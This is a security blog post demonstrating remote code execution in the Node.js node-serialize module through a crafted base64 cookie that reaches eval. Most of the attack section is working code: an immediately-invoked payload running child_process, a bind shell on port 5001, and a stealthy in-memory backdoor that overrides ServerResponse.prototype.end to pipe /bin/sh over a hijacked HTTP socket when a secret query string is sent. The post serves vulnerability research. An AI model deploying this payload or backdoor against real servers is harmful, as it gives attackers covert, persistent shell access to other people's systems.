Several days ago I noticed a blog post on the opsecx blog about exploiting an RCE (Remote Code Execution) bug in a Node.js module called node-serialize. The blog post explains pretty clearly what's wrong with the module in question, but one thing that struck me is how complex the exploitation process was with Burp. No offence to Burp - it is a great tool - but I think we can do better.

In this post I would like to show my take on this particular RCE and also perhaps share additional insight that may prove to be helpful in the future - perhaps in your own research.

Attack Surface

Before we begin, it will be useful to evaluate the attack surface. The node-serialize module is modestly used: at the time of writing it had about 2000 downloads per month and 9 dependants, without any sub-dependants.

Here is a list of all dependant modules: cdlib, cdlibjs, intelligence, malice, mizukiri, modelproxy-engine-mockjs, node-help, sa-sdk-node, scriby, sdk-sa-node, shelldoc, shoots. Without analysing the code there is no way to tell whether these implementations are also vulnerable, but due to the nature of the vulnerability I will assume they are.

More importantly, though, we still haven't answered the question of how widespread this module actually is. 2000 downloads per month could mean many things, and it is hard to gauge the number of applications behind that number. A quick look at GitHub and Google is the only way to get some answers, and this is where things start to get interesting.

A GitHub search turns up 97 potentially vulnerable public modules/applications, which are most likely used privately since they are not listed on npmjs.com. Skimming through the code gives a sense of how widespread (or not) the problem is. I was surprised to find out that it has something to do with Pokémon. Go figure!

I will throw in some support for https://nodesecurity.io here, because it is the only practical way to keep on top of situations like this one, especially where the Node.js module system is concerned. It is free for open-source projects.

Testing Environment

So far we have established that we are dealing with a bug with somewhat limited potential for abuse, which is good from a public safety point of view. Let's move to the more academic side of things and exploit it. In order to test the bug we need a vulnerable application. The opsecx blog provides one, so we will use it in this exercise as well. The code is fairly straightforward.

var express = require('express');
var cookieParser = require('cookie-parser');
var escape = require('escape-html');
var serialize = require('node-serialize');

var app = express();
app.use(cookieParser());

app.get('/', function (req, res) {
    if (req.cookies.profile) {
        var str = new Buffer(req.cookies.profile, 'base64').toString();
        var obj = serialize.unserialize(str);
        if (obj.username) {
            res.send("Hello " + escape(obj.username));
        }
    } else {
        res.cookie('profile', "eyJ1c2VybmFtZSI6ImFqaW4iLCJjb3VudHJ5IjoiaW5kaWEiLCJjaXR5IjoiYmFuZ2Fsb3JlIn0=", {
            maxAge: 900000,
            httpOnly: true
        });
        res.send("Hello stranger");
    }
});

app.listen(3000);

You will need the following package.json file to get it going (run npm install).

{
    "dependencies": {
        "cookie-parser": "^1.4.3",
        "escape-html": "^1.0.3",
        "express": "^4.14.1",
        "node-serialize": "0.0.4"
    }
}

So let's skip to the actual thing. As you can see from the code, this example web app sets a cookie containing the user profile, which is an object serialised with the vulnerable node module and then encoded in base64. To get an idea what the base64 string looks like when unpacked, we can use the Encoder.
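For a quick sanity check outside any tooling, the same decoding can be done in node itself. This sketch just unpacks the default cookie the demo app sets:

```javascript
// Decode the demo app's default profile cookie (plain base64 -> JSON string).
var cookie = 'eyJ1c2VybmFtZSI6ImFqaW4iLCJjb3VudHJ5IjoiaW5kaWEiLCJjaXR5IjoiYmFuZ2Fsb3JlIn0='
var decoded = Buffer.from(cookie, 'base64').toString()
console.log(decoded) // {"username":"ajin","country":"india","city":"bangalore"}
```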

This looks like standard JSON, but looks can be deceiving sometimes. We will get to this later. First, let's set up Rest so that we can test it out. Notice that we are using the Cookie builder to get the correct encoding, and that we are utilising the Encode gadget to convert the JSON string into Base64 format.

Exploit Setup

Now we have a working request, which we will convert into an exploit. The first thing to do is to understand exactly how the vulnerability in node-serialize works. Looking at the source code, it is pretty evident that the module serialises functions, as shown here.

} else if (typeof obj[key] === 'function') {
    var funcStr = obj[key].toString();
    if (ISNATIVEFUNC.test(funcStr)) {
        if (ignoreNativeFunc) {
            funcStr = 'function() {throw new Error("Call a native function unserialized")}';
        } else {
            throw new Error('Can\'t serialize a object with a native function property. Use serialize(obj, true) to ignore the error.');
        }
    }
    outputObj[key] = FUNCFLAG + funcStr;
} else {

The issue manifests as soon as we call the unserialize method. The exact line is here.

if (obj[key].indexOf(FUNCFLAG) === 0) {
    obj[key] = eval('(' + obj[key].substring(FUNCFLAG.length) + ')');
} else if (obj[key].indexOf(CIRCULARFLAG) === 0) {

This means that if we create a JSON object with an arbitrary property whose value begins with _$$ND_FUNC$$_, we get remote code execution, because the remainder of the value is passed straight to eval. To test this we can use the following setup.
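As a sketch, a malicious cookie can be built in a few lines of node. The property name (rce below) is arbitrary and of my own choosing; the trailing parentheses turn the serialised function into an immediately-invoked function expression, so it fires during unserialize rather than waiting to be called:

```javascript
// Build a profile cookie value that triggers eval inside unserialize().
// The trailing () makes the deserialised function execute immediately.
var payload = {
    rce: "_$$ND_FUNC$$_function () { require('child_process').exec('ls -la') }()"
}
var cookie = Buffer.from(JSON.stringify(payload)).toString('base64')
console.log(cookie) // use this as the profile cookie value
```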

If successful, and it should be, you will get an error back, because the server exits before the request is completed. Now we have remote code execution, but we can do better.

Our Pivot

I find the exploitation technique presented in the opsecx blog a bit crude for my liking. It is perfectly fine for demonstration purposes, but given that we have already achieved eval inside a node process, there are many things we can do to pull off a more elegant hack without involving python and staging the attack. Since we are going to write several large code blocks, we may as well modify our working exploit so that it is easier to work with. For that we will use variables. Go into the Variables tab and set up a new variable called code.

This is going to store our code so that we don't have to worry about encodings. Now all we have to do is modify the profile cookie so that the code variable is embedded with the correct encoding for both JSON and the special way node-serialize handles functions.

This is beautiful! Now every time we change the code variable, the profile cookie payload will change dynamically, keeping the chain of encodings and the node-serialize magic intact.

In-memory Backdoor

We need to work on our code payload. Assuming that we don't know how the app works, we need a generic way of exploiting it, or for that matter any other application, without prior knowledge of the environment or the setup. This means that we cannot rely on global scope variables that may or may not exist. We cannot rely on the express app being exported so that additional routes can be installed. We don't want to open new ports or spawn a reverse shell, in order to keep a minimal profile, etc.

This is a big list of requirements to satisfy, but after some research it is easy to find a way to make this work.

Our journey starts by taking a reference to the ServerResponse function from the http module. The prototype of ServerResponse is used as the __proto__ of the response object in expressjs.

var res = module.exports = { __proto__: http.ServerResponse.prototype };

This means that if we change the prototype of ServerResponse, the change will be reflected in the __proto__ of the response object. The send method of the response object calls into the ServerResponse prototype.

if (req.method === 'HEAD') {
    this.end();
} else {
    this.end(chunk, encoding);
}

This means that once the send method is invoked, a call will be made to the end method, which happens to come from the prototype of ServerResponse. Since the send method is used by pretty much everything expressjs-related, this also means that we now have a direct way to quickly gain access to more interesting structures, such as the currently open socket. If we override the end method of the prototype, we can get a reference to the socket object through this.

The code to achieve this effect will look like this.

require('http').ServerResponse.prototype.end = (function (end) {
    return function () {
        // this.socket is now within reach
        end.apply(this, arguments)
    }
})(require('http').ServerResponse.prototype.end)

Since we are overriding end on the prototype, we also need some way to differentiate our startup request from any other request, as intercepting everything may result in unexpected behaviour. We will check the query string for a special value (abc123) that marks our own evil request. This information can be retrieved by accessing the _httpMessage object on the socket, like this.

require('http').ServerResponse.prototype.end = (function (end) {
    return function () {
        if (this.socket._httpMessage.req.query.q === 'abc123') {
            // this is our own evil request
        } else {
            end.apply(this, arguments)
        }
    }
})(require('http').ServerResponse.prototype.end)

Now we have everything lined up. What is left is to start the shell. In node this is relatively straightforward.

var cp = require('child_process')
var net = require('net')

net.createServer((socket) => {
    var sh = cp.spawn('/bin/sh')
    sh.stdout.pipe(socket)
    sh.stderr.pipe(socket)
    socket.pipe(sh.stdin)
}).listen(5001)

After we merge both segments, the final code looks like this. Notice how we redirect the end function to spawn a shell within node, reusing the already established socket. This is pure fun!

require('http').ServerResponse.prototype.end = (function (end) {
    return function () {
        if (this.socket._httpMessage.req.query.q === 'abc123') {
            var cp = require('child_process')
            var sh = cp.spawn('/bin/sh')
            sh.stdout.pipe(this.socket)
            sh.stderr.pipe(this.socket)
            this.socket.pipe(sh.stdin)
        } else {
            end.apply(this, arguments)
        }
    }
})(require('http').ServerResponse.prototype.end)

Now open netcat to localhost 3000 and type the following request (the blank line terminates the HTTP headers).

$ nc localhost 3000
GET /?q=abc123 HTTP/1.1

ls -la

What? That gets you nowhere. This is a little gotcha that I wanted to cover separately. You see, we are hijacking an existing socket, and as such we are not the only custodians of the beast. Other listeners are probably still responding on that socket, so we need to make sure we take care of them. Luckily this is easy to achieve with a bit of knowledge of how node sockets work. The final code looks like this.

require('http').ServerResponse.prototype.end = (function (end) {
    return function () {
        if (this.socket._httpMessage.req.query.q === 'abc123') {
            ['close', 'connect', 'data', 'drain', 'end', 'error', 'lookup', 'timeout'].forEach(this.socket.removeAllListeners.bind(this.socket))

            var cp = require('child_process')
            var sh = cp.spawn('/bin/sh')
            sh.stdout.pipe(this.socket)
            sh.stderr.pipe(this.socket)
            this.socket.pipe(sh.stdin)
        } else {
            end.apply(this, arguments)
        }
    }
})(require('http').ServerResponse.prototype.end)

And finally we are here. Now we can take advantage of this vulnerability whenever we like. A remote shell can be obtained by sending a request with our special string, utilising the same server process and the established socket.

Conclusion

We started with a simple RCE vulnerability and ended up creating a generic way of spawning a shell across an already established HTTP channel, which should work independently in many types of situations, with a few caveats which I will leave for you to figure out. The best part of the whole thing is that the exploitation process was made simple with the help of Rest, which has undoubtedly been the star of the show in the last several posts: 1, 2, 3.